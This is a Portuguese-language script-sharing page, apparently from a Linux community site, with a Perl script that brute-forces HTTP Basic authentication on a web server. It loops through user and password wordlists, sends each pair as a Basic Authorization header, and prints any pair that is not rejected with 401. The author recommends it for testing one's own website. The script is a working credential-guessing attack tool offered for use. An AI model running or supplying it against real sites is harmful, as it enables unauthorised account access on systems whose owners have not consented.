brute_basic
Publicado por Marcelo 25/01/2004
[ Hits: 6.293 ]
Script que faz brute-force em autenticação via web do tipo Basic (digest ainda não foi incluído), o script precisa de duas listas de nomes, para usuários e senhas, você pode escolher entre método HEAD e GET (alguns sites bloqueiam HEAD), mas como o script ainda não trabalha com threads, ele é extremamente lento para grandes brute-forces, por isso é mais recomendado para testar o seu próprio website, o script utiliza HTTP 1.1, espero que em próximas versões eu inclua threads...
#!/usr/bin/perl
use Socket;
use IO::Socket;
use MIME::Base64;
if ($ARGV[3] =~ /g/) { $metodo='GET'; print "Utilizando método GET ao invés de H
EAD\n"; }
else { $metodo='HEAD'; }
open(logins,$ARGV[1]);
@url=split(/\//,$ARGV[0]);
$get='/';
$ip=gethostbyname($url[0]);
if ($ip) { $ip=inet_ntoa($ip); }
else {
print "Erro no DNS ao tentar resolver $url[0]!\n";
exit(1);
}
for ($i=1;$url[$i];$i++) {
$get="$get/$url[$i]";
}
if (substr($ARGV[0],(length($ARGV[0])-1)) eq '/') { $get="$get/"; }
print "Iniciando tentativa de brute-force em $url[0]\n";
for ($nl=0;($user=<logins>);$nl++) {
chop $user;
close(senhas);
open(senhas,$ARGV[2]);
for ($np=0;($senha=<senhas>);$np++) {
chop $senha;
$final=encode_base64("$user:$senha");
$sock=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>80,Timeout=>3);
if ($sock) { print $sock "$metodo $get HTTP/1.1\nHost: $url[0]\nAuthorization:
Basic $final\n\n"; }
@div=split(/ /,<$sock>);
if ($div[1] eq '403') {
print "Forbidden retornado do servidor, pode ser um anti brute-force\n";
}
elsif ($div[1] eq '405') {
print "O método $metodo não é permitido pelo servidor:\n";
if ($metodo eq 'HEAD') {
print "Tente usar a opção -g no final, que utiliza GET";
}
else {
print "Alguma coisa muito estranha está acontecendo... o servidor não suporta o método GET, não é impossível, mas simplesmente inútil e impede a navegação normal. Verifique se está tudo certo e se o site é navegável!";
}
print "\nFechando o brute-force.\n";
exit(1);
}
else {
if ($div[1] ne '401') {
print "$user:$senha -> OK! <-> Retorno: $div[1]\n";
$a++;
}
}
# print "$div[0] $div[1] $div[2]\n";
close($sock);
}
}
if (!$a) { $a=0; }
print "Programa terminado, combinações tentadas: ".($nl*$np).", senhas achadas: $a\n";
Gerador de Senhas Aleatórias VERSÃO 2.0
Zend Framework application.ini vulnerability exploit
Nenhum comentário foi encontrado.
Patrocínio
Destaques
Artigos
Instalar e Configurar o Slackware Linux em 2025
Como configurar os repositórios do apt no Debian 12 em 2025
Passkeys: A Evolução da Autenticação Digital
Instalação de distro Linux em computadores, netbooks, etc, em rede com o Clonezilla
Dicas
Configurando o Conky para iniciar corretamente no sistema
3 configurações básicas que podem melhorar muito a sua edição pelo editor nano
Como colorir os logs do terminal com ccze
Instalação Microsoft Edge no Linux Mint 22
Como configurar posicionamento e movimento de janelas no Lubuntu (Openbox) com atalhos de teclado
Tópicos
Jogando com Proton no LInux (0)
Ingress NGINX Controller CVSS base score of 9.8 (4)
Impossível corrigir problemas, você manteve (hold) pacotes quebrados. (2)
Top 10 do mês
-
Xerxes
1° lugar - 74.905 pts -
Fábio Berbert de Paula
2° lugar - 53.305 pts -
Buckminster
3° lugar - 18.274 pts -
Mauricio Ferrari
4° lugar - 17.687 pts -
Daniel Lara Souza
5° lugar - 15.431 pts -
Alberto Federman Neto.
6° lugar - 15.152 pts -
Diego Mendes Rodrigues
7° lugar - 14.724 pts -
edps
8° lugar - 13.652 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
9° lugar - 12.050 pts -
Andre (pinduvoz)
10° lugar - 11.854 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
